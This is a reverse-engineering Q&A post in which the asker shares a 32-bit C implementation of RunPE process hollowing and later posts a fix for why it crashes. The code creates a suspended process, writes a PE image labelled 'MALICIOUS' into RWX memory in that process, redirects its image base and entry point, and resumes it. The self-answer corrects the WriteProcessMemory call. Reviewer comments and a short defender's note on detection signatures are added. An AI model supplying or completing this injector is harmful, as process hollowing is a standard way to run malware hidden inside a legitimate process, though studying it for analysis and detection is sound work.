Reverse Engineering Asked by Mohannad Raafat on July 19, 2021
I’m trying to use RunPE technique (For learning).
First, I tried it on Windows XP (32-bit): no error occurred, but the injected code (a HelloWorld) didn’t run.
Then I tried it on Windows 7 and 10 (64-bit) and got this error [0xc00000005] when the thread was resumed.
Why do I get this error, and why didn’t the injected code run on the XP machine?
I also tried unmapping the image base (0x00400000), but I had the same problem.
my code:
/*
 * runPe — copies a PE image that is already in this process's memory into a
 * freshly created, suspended copy of the current executable and resumes that
 * process at the copied image's entry point (the "RunPE" / process-hollowing
 * pattern the question is about).
 *
 * image   : pointer to a complete PE file in memory (DOS header at offset 0).
 *           Only the NT signature is validated; e_lfanew, section offsets and
 *           sizes are used as found in the image.
 * returns : 0 once ResumeThread has been called, -1 on any failure.  On the
 *           failure paths the suspended child is left alive (never terminated),
 *           and pinfo.hProcess, pinfo.hThread and ctx are not released on any
 *           path.
 *
 * Portability: this is 32-bit-only code.  Pointers are pushed through DWORD in
 * the arithmetic below (truncating on a 64-bit build) and the CONTEXT fields
 * used (Ebx, Eax) belong to the x86 CONTEXT layout.
 *
 * Defender's note: the call chain below — CreateProcess(CREATE_SUSPENDED),
 * GetThreadContext, VirtualAllocEx with PAGE_EXECUTE_READWRITE in another
 * process, WriteProcessMemory into it, SetThreadContext, ResumeThread — is the
 * canonical hollowing sequence and is precisely what endpoint telemetry and
 * behavioural rules key on: cross-process RWX allocation, remote memory writes,
 * and a thread context rewritten before the primary thread ever runs.
 *
 * NOTE(review): every printf string ends in a bare "n"; the "\n" escapes appear
 * to have been lost in the paste.  String literals are left untouched here.
 */
int runPe(void* image) {
    IMAGE_DOS_HEADER* dosHeader;
    IMAGE_NT_HEADERS* ntHeader;
    IMAGE_SECTION_HEADER* sectionHeader;
    CONTEXT* ctx;
    PROCESS_INFORMATION pinfo;
    STARTUPINFO sinfo;
    int i;
    DWORD* ImageBase = NULL;   // filled by the ReadProcessMemory below, then never read again
    void* pImage = NULL;       // base of the allocation in the child that receives the image
    char currentpath[1024];
    GetModuleFileNameA(0, currentpath, 1024); //path to the current exe (return value / truncation unchecked)
    //Identifying the MALICIOUS IMAGE HEADERS
    dosHeader = (PIMAGE_DOS_HEADER)(image);
    // e_lfanew is trusted as-is; the cast through DWORD truncates the pointer on a 64-bit build
    ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
    //Checks if this is a PE FILE (NT signature only: no MZ, size or machine-type check)
    if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
        ZeroMemory(&pinfo, sizeof(pinfo));
        ZeroMemory(&sinfo, sizeof(sinfo));   // NOTE(review): sinfo.cb is left at 0; Win32 expects it set to sizeof(sinfo)
        // Launch a second copy of this executable with its primary thread created suspended
        if (CreateProcessA(currentpath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &sinfo, &pinfo)) {
            printf("[*] Suspended process is createdn");
            Sleep(600);
            //Allocate memory for the context of suspended process
            // NOTE(review): sizeof(ctx) is the size of the pointer, not of CONTEXT.
            // VirtualAlloc commits whole pages so the struct still fits, but
            // sizeof(*ctx) is what is meant (a stack-local CONTEXT would also do).
            ctx = (LPCONTEXT)(VirtualAlloc(NULL, sizeof(ctx), MEM_COMMIT, PAGE_READWRITE));
            if (ctx) {
                ctx->ContextFlags = CONTEXT_FULL;   // ask for the full register set; Ebx is read and Eax written below
                printf("[*] Context is allocated successfullyn");
                Sleep(600);
                //Get the thread context
                if (GetThreadContext(pinfo.hThread, (LPCONTEXT)ctx)) {
                    printf("[*] Allocating MALICIOUS image headers into the suspended processn");
                    Sleep(600);
                    // Read 4 bytes at Ebx+8 in the child into the local ImageBase.  The comment
                    // at the matching write below calls this slot the child's image base
                    // (presumably Ebx points at a process structure in the initial x86
                    // context — confirm).  The value is never used afterwards and the
                    // ReadProcessMemory result is not checked.
                    ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8), (LPVOID)(&ImageBase), 4, 0);
                    // Reserve+commit SizeOfImage bytes of RWX memory in the child at an
                    // address of the system's choosing (NULL), not at the image's preferred base
                    pImage = VirtualAllocEx(pinfo.hProcess, NULL,
                        ntHeader->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
                    if (pImage) {
                        printf("[*] Allocating memory for MALICIOUS image headers into the IMAGE_BASEn");
                        Sleep(600);
                        //Writing the image headers (SizeOfHeaders bytes) into the child's address space
                        if (WriteProcessMemory(pinfo.hProcess, (LPVOID)pImage, image, ntHeader->OptionalHeader.SizeOfHeaders, NULL)) {
                            printf("[*] Writing memory for MALICIOUS image headers into the IMAGE_BASEn");
                            Sleep(600);
                            //sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
                            // Copy each section's raw data to its VirtualAddress inside pImage.
                            // The literal 248 stands in for the sizeof(IMAGE_NT_HEADERS) of the
                            // commented-out line (the 32-bit header size).  PointerToRawData and
                            // SizeOfRawData are taken from the image without bounds checks.
                            for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
                            {
                                sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
                                if (sectionHeader->SizeOfRawData == 00000000)   // octal literal, i.e. 0: sections with no raw data are skipped
                                    continue;
                                if (WriteProcessMemory(pinfo.hProcess, (LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),
                                    (LPVOID)((DWORD)image + sectionHeader->PointerToRawData), sectionHeader->SizeOfRawData, 0))
                                {
                                    // NOTE(review): %X with a pointer argument is a format/type mismatch (%p matches)
                                    printf("[*] Allocating memory for Section %d at %Xn", i, (LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
                                    Sleep(600);
                                }
                                else
                                {
                                    printf("ERROR: Writing section (%d) into memory failedn", i);
                                    printf("Error Code: %dn", GetLastError());
                                    return -1;   // suspended child, its handles and ctx are leaked here (and at every return -1 below)
                                }
                            }
                            //Change the imageBase address from the suspended process into the MALICIOUS
                            // Overwrite the 4-byte slot at Ebx+8 in the child with the image's preferred
                            // ImageBase.  As written, the ImageBase *value* is cast to a pointer and passed
                            // as the source buffer, so 4 bytes are read from that address in this process;
                            // the accepted fix on this page passes &ntHeader->OptionalHeader.ImageBase.
                            // Note also that what is written is the preferred base, while the sections and
                            // the entry point below live at pImage, wherever VirtualAllocEx placed it.
                            if (WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(ntHeader->OptionalHeader.ImageBase), 4, 0)) {
                                printf("[*] Image base address is changed to MALICIOUSn");
                                Sleep(600);
                                //Now we will move the address of entrypoint to the MALICIOUS image
                                // At EAX register — the code relies on Eax in the initial suspended
                                // context being the address the thread will start from (presumed; confirm)
                                ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
                                printf("[*] AddressOfEntryPoint is changed to MALICIOUSn");
                                Sleep(600);
                                //Set Thread Context and resume it
                                // NOTE(review): unlike the other API calls, the results of SetThreadContext
                                // and ResumeThread are not checked; if SetThreadContext fails the child is
                                // resumed with its original context and the message below is still printed.
                                SetThreadContext(pinfo.hProcess, (LPCONTEXT)ctx);
                                ResumeThread(pinfo.hThread);
                                printf("[*] Thread is resumedn");
                            }
                            else
                            {
                                printf("ERROR: Change the imageBase address from the suspened process into the MALICIOUS failedn");
                                printf("Error Code: %dn", GetLastError());
                                return -1;
                            }
                        }
                        else
                        {
                            printf("ERROR: Writing the image into the process address space failedn");
                            printf("Error Code: %dn", GetLastError());
                            return -1;
                        }
                    }
                    else
                    {
                        printf("ERROR: Allocating memory for MALICIOUS image headers into the IMAGE_BASE failedn");
                        printf("Error Code: %dn", GetLastError());
                        return -1;
                    }
                }
                else
                {
                    printf("ERROR: GetThreadContext failedn");
                    printf("Error Code: %dn", GetLastError());
                    return -1;
                }
            }
            else
            {
                printf("ERROR: Context allocation failedn");
                printf("Error Code: %dn", GetLastError());
                return -1;
            }
        }
        // Note: a failed CreateProcessA falls through silently to the success return value
        return 0;
    }
    else
    {
        // GetLastError is not meaningful here: no API call has failed, the signature check did
        printf("ERROR: Invalid nt SIGNATUREn");
        printf("Error Code: %dn", GetLastError());
        return -1;
    }
}
SOLVED:
I must pass the address of the buffer, not the value inside that buffer, to WriteProcessMemory [call by reference].
Modified:
WriteProcessMemory(pinfo.hProcess, (LPVOID)(ctx->Ebx + 8), (LPVOID)(&ntHeader->OptionalHeader.ImageBase), 4, 0)
Correct answer by Mohannad Raafat on July 19, 2021